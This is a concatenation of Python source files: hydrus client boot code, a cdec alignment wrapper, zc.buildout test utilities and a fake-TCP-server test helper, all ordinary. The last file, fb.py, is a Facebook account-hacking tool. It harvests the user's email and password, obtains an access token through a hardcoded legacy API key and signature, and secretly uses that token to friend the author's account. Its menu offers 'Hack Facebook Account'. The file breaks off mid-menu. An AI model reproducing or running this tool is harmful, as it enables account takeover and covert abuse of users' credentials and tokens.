    argparser.add_argument( '--db_memory_journaling', action='store_true', help = 'OBSOLETE: run using MEMORY db journaling (DANGEROUS)' )

    result = argparser.parse_args()

    # Resolve the db directory: explicit argument, else the default location,
    # falling back to the userpath when the default is not writeable (or when
    # running from a macOS app bundle).
    if result.db_dir is None:

        db_dir = HC.DEFAULT_DB_DIR

        if not HydrusPaths.DirectoryIsWriteable( db_dir ) or HC.RUNNING_FROM_MACOS_APP:

            if HC.USERPATH_DB_DIR is None:

                raise Exception( 'The default db path "{}" was not writeable, and the userpath could not be determined!'.format( HC.DEFAULT_DB_DIR ) )

            db_dir = HC.USERPATH_DB_DIR

    else:

        db_dir = result.db_dir

    db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )

    if not HydrusPaths.DirectoryIsWriteable( db_dir ):

        raise Exception( 'The given db path "{}" is not a writeable-to!'.format( db_dir ) )

    try:

        HydrusPaths.MakeSureDirectoryExists( db_dir )

    except:

        raise Exception( 'Could not ensure db path "{}" exists! Check the location is correct and that you have permission to write to it!'.format( db_dir ) )

    if not os.path.isdir( db_dir ):

        raise Exception( 'The given db path "{}" is not a directory!'.format( db_dir ) )

    # Publish the parsed settings through the globals module.
    HG.no_daemons = result.no_daemons

    HG.db_journal_mode = result.db_journal_mode

    # Obsolete flags still map onto the journal mode for compatibility.
    if result.no_wal:

        HG.db_journal_mode = 'TRUNCATE'

    if result.db_memory_journaling:

        HG.db_journal_mode = 'MEMORY'

    if result.db_cache_size is not None:

        HG.db_cache_size = result.db_cache_size

    else:

        HG.db_cache_size = 200

    if result.db_transaction_commit_period is not None:

        # Enforce the documented minimum of 10 seconds.
        HG.db_transaction_commit_period = max( 10, result.db_transaction_commit_period )

    else:

        HG.db_transaction_commit_period = 30

    if result.db_synchronous_override is not None:

        HG.db_synchronous = int( result.db_synchronous_override )

    else:

        # WAL journaling is safe with synchronous=1; other modes use 2.
        if HG.db_journal_mode == 'WAL':

            HG.db_synchronous = 1

        else:

            HG.db_synchronous = 2

    HG.no_db_temp_files = result.no_db_temp_files

    HG.boot_debug = result.boot_debug

    # twisted is optional; flag its absence rather than failing the boot.
    try:

        from twisted.internet import reactor

    except:

        HG.twisted_is_broke = True

except Exception as e:

    # Boot failed: try to log normally, then always write a crash log to the
    # db dir (if known) or the user's home/Desktop, and exit non-zero.
    try:

        HydrusData.DebugPrint( 'Critical boot error occurred! Details written to crash.log!' )
        HydrusData.PrintException( e )

    except:

        pass

    import traceback

    error_trace = traceback.format_exc()

    print( error_trace )

    if 'db_dir' in locals() and os.path.exists( db_dir ):

        emergency_dir = db_dir

    else:

        emergency_dir = os.path.expanduser( '~' )

        possible_desktop = os.path.join( emergency_dir, 'Desktop' )

        if os.path.exists( possible_desktop ) and os.path.isdir( possible_desktop ):

            emergency_dir = possible_desktop

    dest_path = os.path.join( emergency_dir, 'hydrus_crash.log' )

    with open( dest_path, 'w', encoding = 'utf-8' ) as f:

        f.write( error_trace )

    print( 'Critical boot error occurred! Details written to hydrus_crash.log in either db dir or user dir!' )

    sys.exit( 1 )

def boot():
    """Run the client controller inside the logger context, starting the
    twisted reactor thread if available, and shut everything down cleanly."""
    if result.temp_dir is not None:

        HydrusPaths.SetEnvTempDir( result.temp_dir )

    controller = None

    with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:

        try:

            HydrusData.Print( 'hydrus client started' )

            if not HG.twisted_is_broke:

                import threading

                # installSignalHandlers=0: the controller owns signal handling.
                threading.Thread( target = reactor.run, name = 'twisted', kwargs = { 'installSignalHandlers' : 0 } ).start()

            from hydrus.client import ClientController

            controller = ClientController.Controller( db_dir )

            controller.Run()

        except:

            HydrusData.Print( 'hydrus client failed' )

            import traceback

            HydrusData.Print( traceback.format_exc() )

        finally:

            # Signal shutdown to all components, wake daemons so they notice,
            # and stop the reactor from its own thread.
            HG.view_shutdown = True
            HG.model_shutdown = True

            if controller is not None:

                controller.pubimmediate( 'wake_daemons' )

            if not HG.twisted_is_broke:

                reactor.callFromThread( reactor.stop )

            HydrusData.Print( 'hydrus client shut down' )

    HG.shutdown_complete = True

    if HG.restart:

        HydrusData.RestartProcess()
force_align.py
#!/usr/bin/env python
#
# This code is partially taken from the force_align.py script of cdec project
#
import os
import subprocess
import sys
import threading

# Simplified, non-threadsafe version for force_align.py
# Use the version in realtime for development


class Aligner:
    """Drive cdec's fast_align (forward + reverse) and atools as co-processes
    to produce a symmetrized word alignment for one sentence pair at a time.

    Requires the CDEC_HOME environment variable to point at a cdec checkout.
    """

    def __init__(self, fwd_params, fwd_err, rev_params, rev_err, heuristic='grow-diag-final-and'):
        # 'dict.has_key' was removed in Python 3; the 'in' test is equivalent
        # and works on both majors.
        if 'CDEC_HOME' not in os.environ:
            sys.stderr.write('CDEC_HOME not specified\n')
            sys.exit(2)
        cdec_root = os.environ['CDEC_HOME']
        fast_align = os.path.join(cdec_root, 'word-aligner', 'fast_align')
        atools = os.path.join(cdec_root, 'utils', 'atools')
        # T (tension) and m (mean length ratio) are recovered from the stderr
        # logs written during training and passed back on the command line.
        (fwd_T, fwd_m) = self.read_err(fwd_err)
        (rev_T, rev_m) = self.read_err(rev_err)
        fwd_cmd = [fast_align, '-i', '-', '-d', '-T', fwd_T, '-m', fwd_m, '-f', fwd_params]
        rev_cmd = [fast_align, '-i', '-', '-d', '-T', rev_T, '-m', rev_m, '-f', rev_params, '-r']
        tools_cmd = [atools, '-i', '-', '-j', '-', '-c', heuristic]
        self.fwd_align = popen_io(fwd_cmd)
        self.rev_align = popen_io(rev_cmd)
        self.tools = popen_io(tools_cmd)

    def align(self, line):
        """Align one 'f words ||| e words' pair; return the symmetrized
        alignment line emitted by atools."""
        self.fwd_align.stdin.write('{}\n'.format(line.encode('utf-8')))
        self.rev_align.stdin.write('{}\n'.format(line.encode('utf-8')))
        # Bugfix: flush, otherwise the request can sit in the pipe's buffer
        # while we block on readline() below, deadlocking both processes.
        self.fwd_align.stdin.flush()
        self.rev_align.stdin.flush()
        # f words ||| e words ||| links ||| score
        fwd_line = self.fwd_align.stdout.readline().split('|||')[2].strip()
        rev_line = self.rev_align.stdout.readline().split('|||')[2].strip()
        self.tools.stdin.write('{}\n'.format(fwd_line))
        self.tools.stdin.write('{}\n'.format(rev_line))
        self.tools.stdin.flush()
        al_line = self.tools.stdout.readline().strip()
        return al_line

    def close(self):
        """Close the children's stdin (signalling EOF) and reap them."""
        self.fwd_align.stdin.close()
        self.fwd_align.wait()
        self.rev_align.stdin.close()
        self.rev_align.wait()
        self.tools.stdin.close()
        self.tools.wait()

    def read_err(self, err):
        """Extract (T, m) from a fast_align stderr log file.

        Both values are returned as strings (they go straight back onto a
        command line); missing values come back as ''.
        """
        (T, m) = ('', '')
        # Bugfix: close the log file instead of leaking the handle.
        with open(err) as f:
            for line in f:
                # expected target length = source length * N
                if 'expected target length' in line:
                    m = line.split()[-1]
                # final tension: N
                elif 'final tension' in line:
                    T = line.split()[-1]
        return (T, m)


def popen_io(cmd):
    """Start cmd with piped stdin/stdout; stderr is drained by a background
    thread so the child can never block on a full stderr pipe."""
    p = subprocess.Popen(cmd,
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)

    def consume(s):
        for _ in s:
            pass
    threading.Thread(target=consume, args=(p.stderr,)).start()
    return p


def main():
    """CLI entry point: read sentence pairs on stdin, write alignments."""
    if len(sys.argv[1:]) < 4:
        sys.stderr.write('run:\n')
        sys.stderr.write(' fast_align -i corpus.f-e -d -v -o -p fwd_params >fwd_align 2>fwd_err\n')
        sys.stderr.write(' fast_align -i corpus.f-e -r -d -v -o -p rev_params >rev_align 2>rev_err\n')
        sys.stderr.write('\n')
        sys.stderr.write('then run:\n')
        sys.stderr.write(' {} fwd_params fwd_err rev_params rev_err [heuristic] <in.f-e >out.f-e.gdfa\n'.format(sys.argv[0]))
        sys.stderr.write('\n')
        sys.stderr.write('where heuristic is one of: (intersect union grow-diag grow-diag-final grow-diag-final-and) default=grow-diag-final-and\n')
        sys.exit(2)
    aligner = Aligner(*sys.argv[1:])
    while True:
        line = sys.stdin.readline()
        if not line:
            break
        line = line[:-1].decode('utf-8')
        sys.stdout.write('{}\n'.format(aligner.align(line.strip())))
        sys.stdout.flush()
    aligner.close()


if __name__ == '__main__':
    main()
testing.py
############################################################################# # # Copyright (c) 2004-2009 Zope Foundation and Contributors. # All Rights Reserved. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## """Various test-support utility functions """ try: # Python 3 from http.server import HTTPServer, BaseHTTPRequestHandler from urllib.request import urlopen except ImportError: # Python 2 from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler from urllib2 import urlopen import errno import logging import os import pkg_resources import random import re import shutil import socket import subprocess import sys import tempfile import threading import time import zc.buildout.buildout import zc.buildout.easy_install from zc.buildout.rmtree import rmtree print_ = zc.buildout.buildout.print_ fsync = getattr(os, 'fsync', lambda fileno: None) is_win32 = sys.platform == 'win32' setuptools_location = pkg_resources.working_set.find( pkg_resources.Requirement.parse('setuptools')).location def cat(dir, *names): path = os.path.join(dir, *names) if (not os.path.exists(path) and is_win32 and os.path.exists(path+'-script.py') ): path = path+'-script.py' with open(path) as f: print_(f.read(), end='') def ls(dir, *subs): if subs: dir = os.path.join(dir, *subs) names = sorted(os.listdir(dir)) for name in names: if os.path.isdir(os.path.join(dir, name)): print_('d ', end=' ') elif os.path.islink(os.path.join(dir, name)): print_('l ', end=' ') else: print_('- ', end=' ') print_(name) def mkdir(*path): os.mkdir(os.path.join(*path)) def remove(*path): path = 
os.path.join(*path) if os.path.isdir(path): shutil.rmtree(path) else: os.remove(path) def rmdir(*path): shutil.rmtree(os.path.join(*path)) def write(dir, *args): path = os.path.join(dir, *(args[:-1])) f = open(path, 'w') f.write(args[-1]) f.flush() fsync(f.fileno()) f.close() def clean_up_pyc(*path): base, filename = os.path.join(*path[:-1]), path[-1] if filename.endswith('.py'): filename += 'c' # .py -> .pyc for path in ( os.path.join(base, filename), os.path.join(base, '__pycache__'), ): if os.path.isdir(path): rmdir(path) elif os.path.exists(path): remove(path) ## FIXME - check for other platforms MUST_CLOSE_FDS = not sys.platform.startswith('win') def system(command, input='', with_exit_code=False): p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=MUST_CLOSE_FDS) i, o, e = (p.stdin, p.stdout, p.stderr) if input: i.write(input.encode()) i.close() result = o.read() + e.read() o.close() e.close() output = result.decode() if with_exit_code: # Use the with_exit_code=True parameter when you want to test the exit # code of the command you're running. 
output += 'EXIT CODE: %s' % p.wait() return output def get(url): return str(urlopen(url).read().decode()) def _runsetup(setup, *args): if os.path.isdir(setup): setup = os.path.join(setup, 'setup.py') args = list(args) args.insert(0, '-q') here = os.getcwd() try: os.chdir(os.path.dirname(setup)) zc.buildout.easy_install.call_subprocess( [sys.executable, setup] + args, env=dict(os.environ, PYTHONPATH=setuptools_location)) if os.path.exists('build'): rmtree('build') finally: os.chdir(here) def sdist(setup, dest): _runsetup(setup, 'sdist', '-d', dest, '--formats=zip') def bdist_egg(setup, executable, dest=None): # Backward compat: if dest is None: dest = executable else: assert executable == sys.executable, (executable, sys.executable) _runsetup(setup, 'bdist_egg', '-d', dest) def wait_until(label, func, *args, **kw): if 'timeout' in kw: kw = dict(kw) timeout = kw.pop('timeout') else: timeout = 30 deadline = time.time()+timeout while time.time() < deadline: if func(*args, **kw): return time.sleep(0.01) raise ValueError('Timed out waiting for: '+label) class Buildout(zc.buildout.buildout.Buildout): def __init__(self): zc.buildout.buildout.Buildout.__init__( self, '', [('buildout', 'directory', os.getcwd())]) def initialize(self, *args): pass def buildoutSetUp(test): test.globs['__tear_downs'] = __tear_downs = [] test.globs['register_teardown'] = register_teardown = __tear_downs.append prefer_final = zc.buildout.easy_install.prefer_final() register_teardown( lambda: zc.buildout.easy_install.prefer_final(prefer_final) ) here = os.getcwd() register_teardown(lambda: os.chdir(here)) handlers_before_set_up = logging.getLogger().handlers[:] def restore_root_logger_handlers(): root_logger = logging.getLogger() for handler in root_logger.handlers[:]: root_logger.removeHandler(handler) for handler in handlers_before_set_up: root_logger.addHandler(handler) register_teardown(restore_root_logger_handlers) base = tempfile.mkdtemp('buildoutSetUp') base = os.path.realpath(base) 
register_teardown(lambda base=base: rmtree(base)) old_home = os.environ.get('HOME') os.environ['HOME'] = os.path.join(base, 'bbbBadHome') def restore_home(): if old_home is None: del os.environ['HOME'] else: os.environ['HOME'] = old_home register_teardown(restore_home) base = os.path.join(base, '_TEST_') os.mkdir(base) tmp = tempfile.mkdtemp('buildouttests') register_teardown(lambda: rmtree(tmp)) zc.buildout.easy_install.default_index_url = 'file://'+tmp os.environ['buildout-testing-index-url'] = ( zc.buildout.easy_install.default_index_url) def tmpdir(name): path = os.path.join(base, name) mkdir(path) return path sample = tmpdir('sample-buildout') os.chdir(sample) # Create a basic buildout.cfg to avoid a warning from buildout: with open('buildout.cfg', 'w') as f: f.write("[buildout]\nparts =\n") # Use the buildout bootstrap command to create a buildout zc.buildout.buildout.Buildout( 'buildout.cfg', [('buildout', 'log-level', 'WARNING'), # trick bootstrap into putting the buildout develop egg # in the eggs dir. 
('buildout', 'develop-eggs-directory', 'eggs'), ] ).bootstrap([]) # Create the develop-eggs dir, which didn't get created the usual # way due to the trick above: os.mkdir('develop-eggs') def start_server(path): port, thread = _start_server(path, name=path) url = 'http://localhost:%s/' % port register_teardown(lambda: stop_server(url, thread)) return url cdpaths = [] def cd(*path): path = os.path.join(*path) cdpaths.append(os.path.abspath(os.getcwd())) os.chdir(path) def uncd(): os.chdir(cdpaths.pop()) test.globs.update(dict( sample_buildout = sample, ls = ls, cat = cat, mkdir = mkdir, rmdir = rmdir, remove = remove, tmpdir = tmpdir, write = write, system = system, get = get, cd = cd, uncd = uncd, join = os.path.join, sdist = sdist, bdist_egg = bdist_egg, start_server = start_server, buildout = os.path.join(sample, 'bin', 'buildout'), wait_until = wait_until, print_ = print_, clean_up_pyc = clean_up_pyc, )) zc.buildout.easy_install.prefer_final(prefer_final) def buildoutTearDown(test): for f in test.globs['__tear_downs']: f() class Server(HTTPServer): def __init__(self, tree, *args): HTTPServer.__init__(self, *args) self.tree = os.path.abspath(tree) __run = True def serve_forever(self): while self.__run: self.handle_request() def handle_error(self, *_): self.__run = False class Handler(BaseHTTPRequestHandler): Server.__log = False def __init__(self, request, address, server): self.__server = server self.tree = server.tree BaseHTTPRequestHandler.__init__(self, request, address, server) def do_GET(self): if '__stop__' in self.path: raise SystemExit def k(): self.send_response(200) out = '<html><body>k</body></html>\n'.encode() self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) if self.path == '/enable_server_logging': self.__server.__log = True return k() if self.path == '/disable_server_logging': self.__server.__log = False return k() path = os.path.abspath(os.path.join(self.tree, 
*self.path.split('/'))) if not ( ((path == self.tree) or path.startswith(self.tree+os.path.sep)) and os.path.exists(path) ): self.send_response(404, 'Not Found') #self.send_response(200) out = '<html><body>Not Found</body></html>'.encode() #out = '\n'.join(self.tree, self.path, path) self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) return self.send_response(200) if os.path.isdir(path): out = ['<html><body>\n'] names = sorted(os.listdir(path)) for name in names: if os.path.isdir(os.path.join(path, name)): name += '/' out.append('<a href="%s">%s</a><br>\n' % (name, name)) out.append('</body></html>\n') out = ''.join(out).encode() self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') else: with open(path, 'rb') as f: out = f.read() self.send_header('Content-Length', len(out)) if path.endswith('.egg'): self.send_header('Content-Type', 'application/zip') elif path.endswith('.gz'): self.send_header('Content-Type', 'application/x-gzip') elif path.endswith('.zip'): self.send_header('Content-Type', 'application/x-gzip') else: self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) def log_request(self, code): if self.__server.__log: print_('%s %s %s' % (self.command, code, self.path)) def _run(tree, port): server_address = ('localhost', port) httpd = Server(tree, server_address, Handler) httpd.serve_forever() def get_port(): for i in range(10): port = random.randrange(20000, 30000) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: try: s.connect(('localhost', port)) except socket.error: return port finally: s.close() raise RuntimeError("Can't find port") def _start_server(tree, name=''): port = get_port() thread = threading.Thread(target=_run, args=(tree, port), name=name) thread.setDaemon(True) thread.start() wait(port, up=True) return port, thread def start_server(tree): return _start_server(tree)[0] def 
stop_server(url, thread=None): try: urlopen(url+'__stop__') except Exception: pass if thread is not None: thread.join() # wait for thread to stop def wait(port, up): addr = 'localhost', port for i in range(120): time.sleep(0.25) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(addr) s.close() if up: break except socket.error: e = sys.exc_info()[1] if e[0] not in (errno.ECONNREFUSED, errno.ECONNRESET): raise s.close() if not up: break else: if up: raise else: raise SystemError("Couldn't stop server") def install(project, destination): if not isinstance(destination, str): destination = os.path.join(destination.globs['sample_buildout'], 'eggs') dist = pkg_resources.working_set.find( pkg_resources.Requirement.parse(project)) if dist.location.endswith('.egg'): destination = os.path.join(destination, os.path.basename(dist.location), ) if os.path.isdir(dist.location): shutil.copytree(dist.location, destination) else: shutil.copyfile(dist.location, destination) else: # copy link with open(os.path.join(destination, project+'.egg-link'), 'w') as f: f.write(dist.location) def install_develop(project, destination): if not isinstance(destination, str): destination = os.path.join(destination.globs['sample_buildout'], 'develop-eggs') dist = pkg_resources.working_set.find( pkg_resources.Requirement.parse(project)) with open(os.path.join(destination, project+'.egg-link'), 'w') as f: f.write(dist.location) def _normalize_path(match): path = match.group(1) if os.path.sep == '\\': path = path.replace('\\\\', '/') if path.startswith('\\'): path = path[1:] return '/' + path.replace(os.path.sep, '/') normalize_path = ( re.compile( r'''[^'" \t\n\r]+\%(sep)s_[Tt][Ee][Ss][Tt]_\%(sep)s([^"' \t\n\r]+)''' % dict(sep=os.path.sep)), _normalize_path, ) normalize_endings = re.compile('\r\n'), '\n' normalize_script = ( re.compile('(\n?)- ([a-zA-Z_.-]+)-script.py\n- \\2.exe\n'), '\\1- \\2\n') if sys.version_info > (2, ): normalize___pycache__ = ( re.compile('(\n?)d 
__pycache__\n'), '\\1') else: normalize___pycache__ = ( re.compile('(\n?)- \S+\.pyc\n'), '\\1') normalize_egg_py = ( re.compile('-py\d[.]\d(-\S+)?.egg'), '-pyN.N.egg', ) normalize_exception_type_for_python_2_and_3 = ( re.compile(r'^(\w+\.)*([A-Z][A-Za-z0-9]+Error: )'), '\2') not_found = (re.compile(r'Not found: [^\n]+/(\w|\.)+/\r?\n'), '') # Setuptools now pulls in dependencies when installed. adding_find_link = (re.compile(r"Adding find link '[^']+'" r" from setuptools .*\r?\n"), '') ignore_not_upgrading = ( re.compile( 'Not upgrading because not running a local buildout command.\n' ), '')
testing.py
from __future__ import unicode_literals from builtins import bytes, dict, list, int, float, str import errno import os import os.path import sys import signal import socket import threading import time if sys.version_info.major == 2: class ConnectionRefusedError(Exception): pass class PortFreeTimeout(Exception): def __init__(self, port): self.port = port def __str__(self): return "PortFreeTimeout: Port %d is not free" % (self.port) class PortReadyTimeout(Exception): def __init__(self, port): self.port = port def __str__(self): return "PortReadyTimeout: Port %d is not ready for TCP connections" % (self.port) def wait_for_unix_socket_gone(socket_path, timeout): start_time = time.time() sock = None while (time.time() - start_time < timeout): if not os.path.exists(socket_path): return time.sleep(0.5) raise PortFreeTimeout(socket_path) def wait_for_unix_socket_in_use(socket_path, timeout): start_time = time.time() sock = None while (time.time() - start_time < timeout): if os.path.exists(socket_path): return time.sleep(0.5) raise PortReadyTimeout(socket_path) def wait_for_free_port(host, port, timeout): """ Waits for a TCP port to become free Args: host (str): TCP host to wait for port (int): TCP port to wait for timeout (int): Timeout in seconds until we give up waiting Raises: PortFreeTimeout: If port doesn't become free after timeout seconds """ start_time = time.time() sock = None while (time.time() - start_time < timeout): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) sock.close() except (ConnectionRefusedError, socket.error) as e: if type(e) == socket.error and e.errno != errno.ECONNREFUSED: raise e # success sock.close() return time.sleep(0.5) raise PortFreeTimeout(port) def wait_for_tcp_port_in_use(host, port, timeout): """ Waits for a TCP port to become ready to accept connections Args: host (str): TCP host to wait for port (int): TCP port to wait for timeout (int): Timeout in seconds until we give up waiting Raises: 
PortReadyTimeout: If the port is not ready after timeout seconds """ start_time = time.time() sock = None while (time.time() - start_time < timeout): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) sock.close() return except (ConnectionRefusedError, socket.error) as e: if type(e) == socket.error and e.errno != errno.ECONNREFUSED: raise e # still waiting sock.close() raise PortReadyTimeout(port) class FakeServer(object): """ Runs a TCP server in a thread and replies from a list of pre-defined replies """ def __init__(self, host, port): self.host = host self.port = port self.replies = [] self.requests = [] def add_reply(self, reply): self.replies.append(reply) def run(self): self.thread = threading.Thread(target = self._run, args = ()) self.thread.start() wait_for_tcp_port_in_use(self.host, self.port, 5) def _run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((self.host, self.port)) sock.listen(10) while self.replies: try: conn, addr = sock.accept() request = conn.recv(4096) if not len(request): conn.close() continue self.requests.append(request.decode('utf-8')) reply = self.replies.pop(0) conn.sendall(reply.encode('utf-8')) conn.sendall(b'\r\n') conn.close() except ConnectionResetError: pass sock.close() def stop(self): self.thread.join() if self.thread.is_alive(): raise RuntimeError("Failed to join on FakeServer thread") wait_for_free_port(self.host, self.port, 5) class ServerRunner(object): """ Runs a server program in a subprocess and allows to stop it again """ def __init__(self, path, port): self.directory = os.path.dirname(path) self.server_program = os.path.basename(path) self.host = 'localhost' self.port = port self.pid = None self.timeout = 5 def run(self): # we don't fork before we know that the TCP port/UNIX socket is free if isinstance(self.port, int): wait_for_free_port(self.host, self.port, self.timeout) else: 
wait_for_unix_socket_gone(self.port, self.timeout) pid = os.fork() if not pid: # child os.chdir(self.directory) if self.server_program.endswith('.py'): python = sys.executable os.execl(python, python, self.server_program) else: os.execl(self.server_program, self.server_program) else: # parent self.pid = pid if isinstance(self.port, int): wait_for_tcp_port_in_use(self.host, self.port, self.timeout) else: wait_for_unix_socket_in_use(self.port, self.timeout) def stop(self): os.kill(self.pid, signal.SIGINT) os.waitpid(self.pid, 0) if isinstance(self.port, int): wait_for_free_port(self.host, self.port, self.timeout) else: wait_for_unix_socket_gone(self.port, self.timeout)
fb.py
# -*- coding: utf-8 -*- # katanya programmer kok recode? # saya selaku manusia biasa mengucapkan, "BODO AMAT". # yang penting ngepush github ;-; import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize from multiprocessing.pool import ThreadPool from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '\x1b[1;91m[!] Closed' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.01) logo = " \x1b[1;97m█████████\n \x1b[1;97m█▄█████▄█ \x1b[1;96m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;97m█ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;97m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;97m█ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPRO v1.7\n \x1b[1;97m█████████ \x1b[1;96m«==========✧==========»\n \x1b[1;97m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m xjusthaxor \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m:\x1b[1;92m\x1b[92mhttps://github.com/xjusthaxor\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mYouTube \x1b[1;91m:\x1b[1;92\x1b[92mhttps://www.youtube.com/c/aadityaa\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n[*] Silahkan Login Operamini Agar Tidak Checkpoint\n' def tik(): titik = [ '. ', '.. ', '... 
'] for o in titik: print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) back = 0 threads = [] berhasil = [] cekpoint = [] gagal = [] idfriends = [] idfromfriends = [] idmem = [] id = [] em = [] emfromfriends = [] hp = [] hpfromfriends = [] reaksi = [] reaksigrup = [] komen = [] komengrup = [] listgrup = [] vulnot = '\x1b[31mNot Vuln' vuln = '\x1b[32mVuln' def login(): os.system('clear') try: toket = open('login.txt', 'r') menu() except (KeyError, IOError): os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]' id = raw_input('\x1b[1;91m[+] \x1b[1;36mEmail \x1b[1;91m:\x1b[1;92m ') pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mSandi \x1b[1;91m:\x1b[1;92m ') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print '\n\x1b[1;91m[!] Tidak Ada Koneksi' keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'} x = hashlib.new('md5') x.update(sig) a = x.hexdigest() data.update({'sig': a}) url = 'https://api.facebook.com/restserver.php' r = requests.get(url, params=data) z = json.loads(r.text) zedd = open('login.txt', 'w') zedd.write(z['access_token']) zedd.close() print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success' 
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token']) time.sleep(1) menu() except requests.exceptions.ConnectionError: print '\n\x1b[1;91m[!] Tidak Ada Koneksi' keluar() if 'checkpoint' in url: print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint' os.system('rm -rf login.txt') time.sleep(1) keluar() else: print '\n\x1b[1;91m[!] Gagal Masuk' os.system('rm -rf login.txt') time.sleep(1) login() def menu(): try: toket = open('login.txt', 'r').read() except IOError: os.system('clear') print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: otw = requests.get('https://graph.facebook.com/me?access_token=' + toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket) b = json.loads(ots.text) sub = str(b['summary']['total_count']) except KeyError: os.system('clear') print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(1) login() except requests.exceptions.ConnectionError: print logo print '\x1b[1;91m[!] Tidak Ada Koneksi' keluar() os.system('clear') print logo print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║' print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝' print '║-> \x1b[1;37;40m1. User Information' print '║-> \x1b[1;37;40m2. Hack Facebook Account' print '║-> \x1b[1;37;40m3. Bot' print '║-> \x1b[1;37;40m4. Others' print '║-> \x1b[1;37;40m5. Update' print '║-> \x1b[1;37;40m6. 
